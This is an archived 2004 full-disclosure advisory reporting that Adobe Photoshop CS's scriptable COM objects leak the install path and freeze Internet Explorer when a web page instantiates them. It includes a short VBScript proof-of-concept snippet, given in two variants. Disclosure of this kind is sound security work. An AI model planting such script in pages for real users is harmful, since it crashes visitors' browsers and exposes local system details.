lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <000301c41bf6$c6bff470$a85ab350@fucku>
Date: Tue, 6 Apr 2004 18:46:58 +0200
From: "Rafel Ivgi, The-Insider" <theinsider@....net.il>
To: "securitytracker" <bugs@...uritytracker.com>,
   "SecurITeam News" <news@...uriteam.com>,
   "full-disclosure" <full-disclosure@...ts.netsys.com>,
   "bugtraq" <bugtraq@...urityfocus.com>
Subject: Adobe Photoshop 8.0 (CS) - Local Path Disclosure and causing I.E D.O.S


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application:     Adobe Photoshop
Vendors:          http://www.adobe.com
Version:           8.0 (CS)
Platforms:        Windows
Bug:                 Local Path Disclosure and D.O.S
Risk:                 Medium - Denial Of Service
Exploitation:    Remote with browser
Date:                1 Apr 2004
Author:             Rafel Ivgi, The-Insider
e-mail:              the_insider@...l.com
web:                 http://theinsider.deep-ice.com

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

1) Introduction
2) Bugs
3) The Code

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

===============
1) Introduction
===============

Adobe Photoshop is one of the worlds best graphic editors.
It has a great set of tools, layer combinations, brushes, amazing software.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

======
2) Bug
======

Adobe Photoshop registers a lot of COM objects(such as 
"Photoshop.Application.8"
and "Photoshop.PhotoCDOpenOptions.8"). These objects are marked as "safe"
for scripting. Therefore they can be created remotely(which is the root of 
the problem - they should not!).

Unfortunatly , adobe did not design their object correctly, because upon any 
remote
creation of a Photoshop Object a message pops up saying adobe photoshop 
security
caught "potential tampering with photoshop", however it also reveals the 
local path
of which photoshop was installed in and the Internet Explorer window stops 
responding(D.O.S).

For Example:
 <script language=vbscript>
Dim cooler
Set cooler = CreateObject("Photoshop.Application.8" )
</script>

Will show where photoshop is installed and that
Internet Explorer window stops responding(D.O.S).

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

===========
3) The Code
===========

This is Proof Of Concept Code:
------------------- CUT HERE -------------------
 <script language=vbscript>
Dim cooler
Set cooler = CreateObject("Photoshop.Application.8" )
</script>
------------------- CUT HERE -------------------


Or


------------------- CUT HERE -------------------
<script language=vbscript>
dim cooler
Set cooler = CreateObject("Photoshop.PhotoCDOpenOptions.8" )
</script>
------------------- CUT HERE -------------------

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

--- 
Rafel Ivgi, The-Insider
http://theinsider.deep-ice.com

"Only the one who sees the invisible , Can do the Impossible." 

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ